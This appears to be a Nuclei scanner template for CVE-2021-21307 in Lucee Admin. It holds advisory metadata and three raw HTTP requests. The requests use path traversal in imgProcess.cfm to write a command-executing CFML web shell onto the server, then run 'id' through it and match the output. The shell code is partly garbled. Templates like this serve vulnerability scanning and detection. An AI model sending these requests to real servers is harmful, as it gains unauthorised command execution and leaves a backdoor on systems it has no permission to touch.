id: CVE-2021-21307 info: name: Remote Code Exploit in Lucee Admin author: dhiyaneshDk severity: critical description: Lucee Server is a dynamic, Java based (JSR-223), tag and scripting language used for rapid web application development. In Lucee Admin before versions 5.3.7.47, 5.3.6.68 or 5.3.5.96 there is an unauthenticated remote code exploit. This is fixed in versions 5.3.7.47, 5.3.6.68 or 5.3.5.96. As a workaround, one can block access to the Lucee Administrator. reference: | - https://github.com/lucee/Lucee/security/advisories/GHSA-2xvv-723c-8p7r - https://github.com/httpvoid/writeups/blob/main/Apple-RCE.md - https://nvd.nist.gov/vuln/detail/CVE-2021-21307 tags: cve,cve2021,rce,lucee,adobe requests: - raw: - | POST /lucee/admin/imgProcess.cfm?file=/whatever HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 8 imgSrc=a - | POST /lucee/admin/imgProcess.cfm?file=/../../../context/{{randstr}}.cfm HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 790 imgSrc=
Command:value="#form.cmd#">
Options: value="#form.opts#">
Timeout: value="#form.timeout#" value="5">
        #HTMLCodeFormat(myVar)#
        
- | POST /lucee/{{randstr}}.cfm HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded cmd=id&opts=&timeout=5 matchers-condition: and matchers: - type: word words: - "uid=" - "gid=" - "groups=" part: body condition: and - type: status status: - 200 extractors: - type: regex regex: - "(u|g)id=.*"